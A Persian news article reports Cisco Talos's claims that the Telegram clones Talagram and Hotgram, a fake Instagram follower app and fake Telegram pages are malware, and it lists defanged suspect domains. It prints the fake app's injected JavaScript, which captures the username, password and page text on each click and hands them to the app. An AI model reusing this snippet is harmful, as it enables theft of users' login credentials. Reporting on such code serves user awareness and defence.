ادعای شرکت سیسکو درباره هاتگرام و طلاگرام/گزارش نهایی

کمیته رکن چهارم – به ادعای شرکت امنیت سایبری تالوس، وابسته به سیسکو، تلگرام طلایی و هاتگرام، بدافزار هستند.

 برای طراحی برنامه (فالوئر بگیر اینستاگرام) از چارچوب نرم افزاری (iOS WebKit) استفاده شده است که در زمان ورود به آن، صفحه اولیه اینستاگرام را به شما نمایش می دهد. بر اساس گزارش منتشر شده توسط شرکت سیسکو، این صفحه ورود، جعلی بوده و برای حمله از نوع (injection)، با کدهای جاوا اسکریپت طراحی شده است. در ادامه، کد های این تزریق قابل مشاهده است:

document.addEventListener(‘click’, function() { 
    try { 
        var tu = document.querySelector(‘[name=”username”]’); 
        var tp = document.querySelector(‘[name=”password”]’); 
        var tpV = (typeof tp == ‘undefined’) ? ” : tp.value; 
        var tuV = (typeof tu == ‘undefined’) ? ” : tu.value; 
    } catch (err) { 
        var tuV = ”; 
        var tpV = ”    } 
    var bd = document.getElementsByTagName(‘body’)[0].innerText; 
    var messageToPost = { 
        ‘pu’: tuV, 
        ‘pp’: tpV, 
        ‘bd’: bd 
    }; window.webkit.messageHandlers.buttonClicked.postMessage(messageToPost);}, false);

طبق گزارش شرکت تالوس، مهمترین اطلاعات کاربران در شبکه ها و رسانه های اجتماعی نام کاربری و گذرواژه است. این برنامه جعلی صفحه ای همانند برنامه اینستاگرام به کاربر نمایش می دهد و از طریق کد مخرب فوق، اطلاعات ورود شخص را سرقت می نماید. البته این شرکت امنیت سایبری به این موضوع اشاره نکرده است که اگر کاربر از امکان تایید هویت دو مرحله ای استفاده نماید، چه رویدادی رخ خواهد داد.

تلگرام طلایی یا طلاگرام

تلگرام طلایی یا طلاگرام نام برنامه هایی است که طبق گزارش شرکت امنیت سایبری تالوس، بدافزار هستند. طبق توضیحات منتشر شده مدیران این پیام رسان، طلاگرام مانند برنامه اصلی تلگرام از API های عمومی و آزاد تلگرام استفاده می کند و مستقیما به سرور اصلی تلگرام متصل می شود، ضمنا این برنامه در چارچوب قوانین کشور (ایران) فعالیت می کند.
در ادامه توضیحات این برنامه در وبگاه های مختلف مانند کافه بازار آمده است که از لحاظ امنیت تفاوتی بین تلگرام و تلگرام طلایی (طلگرام) وجود ندارد. شما به راحتی میتوانید در نرم افزار ثبت نام کنید و از امکانات نسخه اصلی تلگرام همراه با قابلیت های دیگر که نسخه طلایی در اختیار شما می گذارد استفاده کنید و هم اکنون می توانید آخرین ورژن این برنامه را دریافت و نصب کنید.  اما شرکت تالوس عقیده ای کاملا متفاوت دارد و معتقد است این برنامه یک بدافزار است.
البته به اعتقاد برخی کارشناسان، فعالیت این پیام رسان، تحت نظر نهادهای قانونی کشور، علت بدافزار اعلام شدن آنها از سوی تالوس است.

هاتگرام

در توضیحات مطرح شده توسط برخی وبگاه ها آمده است که هاتگرام (Hotgram)، یک نسخه غیر رسمی از پیام رسان تلگرام است که نه تنها از سایر نسخه های غیررسمی هیچ چیز کم ندارد، بلکه با ویژگی های داغی که دارد در نوع خود منحصر به فرد است. در هاتگرام امکان جستجو در محتوای تصویری، ویدئویی و متنی تمام کانال های تلگرام بدون اینکه در کانال ها عضو باشید وجود دارد و شما می توانید به تمام پست های داغ از تمام کانال ها بدون عضویت در کانال دسترسی داشته باشید.

علاوه بر این امکان مشاهده پرطرفدارترین و پربازدیدترین پست های تلگرام به تفکیک روز و هفته نیز در این برنامه وجود دارد. همچنین قادر هستید بدون عضویت در کانال ها، در بین تمام کانال های تلگرام جستجو انجام دهید و آن ها را دنبال کنید. در گزارش شرکت امنیت سایبری تالوس آمده که تلگرام طلایی و هاتگرام برای دور زدن قوانین داخلی ایران با بستری متفاوت و کنترل شده ارائه شده است. همچنین در بخش دیگری از این گزارش ادعا شده است که طبق تحقیقات تالوس هیچ سرور و دستگاه فیزیکی برای مدیریت این پیام رسان ها در ایران وجود ندارد و ترافیک موجود روی آنها به خارج از کشور منتقل می شود. به عبارتی دیگر در این برنامه ها فقط نظارت افزایش یافته و هیچ برتری خاصی، نسبت به تلگرام وجود ندارد.

وبگاه جعلی تلگرام

وبگاه هایی با آدرس های مختلف توسط مهاجمان طراحی شده که همانند نسخه دسکتاپ تلگرام هستند. بسیار از کاربران با بی دقتی و بدون توجه به نام دامنه این وبگاه ها اطلاعات خود را در درون آنها وارد می کنند که موجب می شود به آسانی اطلاعات آنها در اختیار هکرها قرار گیرد.

این موضوع بسیار فراگیر شده و در وبگاه هایی مانند «GitHub.com» به سادگی می توان این صفحات جعلی را به دست آورد. برخی از این دامنه ها که توسط شرکت تالوس شناسایی شده است به شرح زیر می باشد.

نتیجه گیری تالوس

شرکت امنیت سایبری تالوس در نهایت این نکته را اظهار کرد که روش های مختلفی برای نفوذ و سرقت اطلاعات کاربران وجود دارد که در این گزارش به برخی از آنها اشاره شد. لذا کاربران باید با حفظ هوشیاری به حفاظت از اطلاعات خود بپردازند. ضمنا به روز رسانی برنامه های مختلف را فقط باید از وبگاه رسمی آنها انجام داد و نباید به سایت ها یا لینک های متفرقه اعتماد کرد. به طور کلی شرکت تالوس مواضع و اتهامات مختلفی را در این گزارش مطرح کرده که البته برای هیچ کدام دلیل و مدرک مستندی ارائه نشده است. 

لیست دامنه هایی که به آنها اتهام وارد شده است، به شرح زیر است. تالوس، مدعی است که بدافزارهای مشابه تلگرام، نظیر هاتگرام، از این طریق منتشر می شوند:

talagram[.]ir
hotgram[.]ir
Harsobh[.]com
ndrm[.]ir
andromedaa[.]ir
buycomment[.]ir
bazdiddarbazdid[.]com
youpo[.]st
im9[.]ir
followerbegir[.]ir
buylike[.]ir
buyfollower[.]ir
andromedaa[.]ir
۳۰dn[.]ir
ndrm[.]ir
followerbeg[.]ir
viewmember[.]ir
ozvdarozv[.]ir
ozvbegir[.]ir
obgr[.]ir
likebeg[.]ir
lbgr[.]ir
followgir[.]ir
followbegir[.]ir
fbgr[.]ir
commentbegir[.]ir
cbgr[.]ir
likebegir[.]com
commentbegir[.]com
andromedaa[.]com
ozvbegir[.]com
ozvdarozv[.]com
andromedaa[.]net
lik3[.]org
homayoon[.]info
buylike[.]in
lkbgr[.]com
flbgr[.]com
andromedaa[.]com
mobilecontinue[.]network
mobilecontinue[.]network
mobile-messengerplus[.]network
confirm-identification[.]name
invitation-to-messenger[.]space
com-messengersaccount[.]name
broadcastnews[.]pro
youridentityactivity[.]world
confirm-verification-process[.]systems
sessions-identifier-memberemailid[.]network
mail-profile[.]com
download-drive-share[.]ga
hangouts-talk[.]ga
mail-login-profile[.]com
watch-youtube[.]live
stratup-monitor[.]com
Xn–oogle-v1a[.]ga (ġoogle[.]ga)
file-share[.]ga

درباره نویسنده

پست های مرتبط

پاسخ دهید


خبرگزاری هرانا

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *


Type The Red Captcha Characters Below.